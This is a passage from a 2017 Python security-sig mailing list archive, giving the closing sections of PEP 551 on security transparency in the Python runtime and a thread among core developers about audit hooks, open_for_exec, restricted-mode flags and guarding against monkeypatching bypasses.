? ? ?Video presented by Matt Dunwoody and Nick Carr for Mandiant at
SchmooCon 2016

? ? ?Detailed walkthrough of the processes and tools used in detecting
and removing
? ? ?an APT.

? ? ?`<https://archive.org/details/No_Easy_Breach>`_

**Disrupting Nation State Hackers**
? ? ?Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

? ? ?Good security practices, capabilities and recommendations from the
chief of
? ? ?NSA's Tailored Access Operation.

? ? ?`<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_

References
==========

.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
? ? Protection Advances in Windows 10,
`<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_

.. [3]
`<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI,
`<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_

.. [6] Persistent Zone Identifiers,
`<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_

.. [7] Event tracing,
`<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

Acknowledgments
===============

Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for
doing much
of the initial research, analysis and implementation, Lee Holmes for
invaluable
insights into the info-sec field and PowerShell's responses, and Brett
Cannon
for the grounding discussions.

Copyright
=========

Copyright (c) 2017 by Microsoft Corporation. This material may be
distributed
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at
http://www.opencontent.org/openpub/).
?

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/security-sig/attachments/20170826/67d70c33/attachment-0001.html>

From steve.dower at python.org  Sat Aug 26 13:05:21 2017
From: steve.dower at python.org (Steve Dower)
Date: Sat, 26 Aug 2017 10:05:21 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <E1dldEX-0000N5-EP@se2-syd.hostedmail.net.au>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
 <E1dldEX-0000N5-EP@se2-syd.hostedmail.net.au>
Message-ID: <78d17f2e-50b6-4bd5-0c24-7d657a3ec3b1@python.org>

On 26Aug2017 0842, Steve Dower wrote:
>> Is there going to be a visible flag or anything to know you're running a
>> restricted version of Python? If so then a subclass will allow us to
>> override get_code() so that it just skips .pyc files and it can be used
>> automatically when the flag is set. That way users of spython don't have
>> to think about setting that up. Otherwise we could provide a function in
>> importlib._bootstrap that you call during initialization to turn this on.
>
> The idea is that importlib and similar code should just use
> open_for_exec when they?re opening files that will be executed, and let
> the hook (if any) worry about validating extensions. The overridden
> function is needed because as you said, there?s currently one open call
> that is used for opening both code and data files, and for data files it
> should just use regular open(). The override can just be permanently
> there, since with no hook there?s no difference. (And custom subclasses
> may also need updating, which gets back to ?if you don?t control the
> code that?s running then none of these protections will protect you? and
> you have to rely on audit hooks.)

And thinking through how to avoid this being trivially bypassed (spoiler 
- it'll always be trivial) has led to adding more audit hooks for 
monkeypatching (set __bases__, set __class__, type.__setattr__, etc.).

Those could also be useful as debugging/coverage tools, and the sort of 
thing you'd use a Python hook for in test code to see what nasty things 
are being done by your dependencies, even if you have no intention of 
tracking them in production.

But between those, a simple isinstance(self, SourceLoader) in 
FileLoader, and guidance in the PEP, I don't think there's any value in 
investing too heavily in preventing people from doing 
`FileLoader.get_data = my_get_data` (which at least requires multiple 
lines of Python code, compared to `del SourceFileLoader.get_data` if 
using a simple override).

Cheers,
Steve

From christian at python.org  Sat Aug 26 13:18:36 2017
From: christian at python.org (Christian Heimes)
Date: Sat, 26 Aug 2017 19:18:36 +0200
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
Message-ID: <106f1a1a-c882-afc4-1cc1-b571617aa763@python.org>

On 2017-08-26 15:45, Brett Cannon wrote:
> Is there going to be a visible flag or anything to know you're running a
> restricted version of Python? If so then a subclass will allow us to
> override get_code() so that it just skips .pyc files and it can be used
> automatically when the flag is set. That way users of spython don't have
> to think about setting that up. Otherwise we could provide a function in
> importlib._bootstrap that you call during initialization to turn this on.

We should add a new attribute to sys.flags, e.g. sys.flags.restricted.

In fact there should be two new flags. We need a way to prevent
interactive Python shells like cmd module and pdb interactive mode.
After all we want to prevent hackers from getting access to an
interactive Python prompt. The cmd module implements such an interactive
command interpreter.

Christian

From steve.dower at python.org  Sat Aug 26 13:31:32 2017
From: steve.dower at python.org (Steve Dower)
Date: Sat, 26 Aug 2017 10:31:32 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <106f1a1a-c882-afc4-1cc1-b571617aa763@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
 <106f1a1a-c882-afc4-1cc1-b571617aa763@python.org>
Message-ID: <c74d22e5-bc35-64de-0cb7-b85df57b4da5@python.org>

On 26Aug2017 1018, Christian Heimes wrote:
> On 2017-08-26 15:45, Brett Cannon wrote:
>> Is there going to be a visible flag or anything to know you're running a
>> restricted version of Python? If so then a subclass will allow us to
>> override get_code() so that it just skips .pyc files and it can be used
>> automatically when the flag is set. That way users of spython don't have
>> to think about setting that up. Otherwise we could provide a function in
>> importlib._bootstrap that you call during initialization to turn this on.
>
> We should add a new attribute to sys.flags, e.g. sys.flags.restricted.

When would the flag be enabled? Currently my proposed changes are 
available all the time, and by design there's no way to know whether 
calls to PySys_LogHook() or open_for_exec() have been hooked or not.

If it can be optionally enabled by the entry point (i.e. spython.c 
enables it but python.c does not), then that would make sense, but I'd 
have to recommend that entry points should probably not set it unless 
they want to reveal that they're auditing the process :)

> In fact there should be two new flags. We need a way to prevent
> interactive Python shells like cmd module and pdb interactive mode.
> After all we want to prevent hackers from getting access to an
> interactive Python prompt. The cmd module implements such an interactive
> command interpreter.

The only reliable way to do this is to remove the modules when you 
deploy to production. Otherwise, the best protection is the fact that 
your code that imports and starts them has already gotten past 
open_for_exec() and whatever your import and compile hooks do (malware 
scan, blocklist, etc.).

Also, interactive prompts are only really used so that attackers can 
pipe code into stdin. If someone is already interactive on your box, 
you're in more trouble than can be solved by blocking interactive Python 
(and if you're at least semi-serious about security, there are already 
hundreds of red flag events).

Cheers,
Steve

From steve.dower at python.org  Mon Aug 28 13:08:06 2017
From: steve.dower at python.org (Steve Dower)
Date: Mon, 28 Aug 2017 10:08:06 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <c74d22e5-bc35-64de-0cb7-b85df57b4da5@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
 <106f1a1a-c882-afc4-1cc1-b571617aa763@python.org>
 <c74d22e5-bc35-64de-0cb7-b85df57b4da5@python.org>
Message-ID: <2384c0d1-df7e-1cba-f9c6-1c12ebb779c9@python.org>

I'm preparing to bring this PEP to python-dev early this week (since I'm 
keen to get the core team talking about it before we meet up next week 
for the sprints). I have a set of changes in a PR at 
https://github.com/python/peps/pull/378/files if anyone wants to add 
more feedback before I merge and post.

The summary of changes:
* rename "event log hook" to "audit hook" (including PySys_Audit, 
PySys_AddAuditHook, etc.)
* added audit points to better handle compile/exec of non-string 
objects, monkeypatching, and pickle.find_class
  - (more audit hooks will come - this is still an incomplete list)
* improved recommendations
* more clarity around the purpose of `spython`
* rejected ideas (separate `audit` module, `sys.flags.XXX`)

Comments by email are preferred, but if you'd rather comment directly on 
the PR then feel free. I'll see them eventually.

You can also look at my current implementation compared to master at:

   https://github.com/python/cpython/compare/master...zooba:sectrans

Thanks,
Steve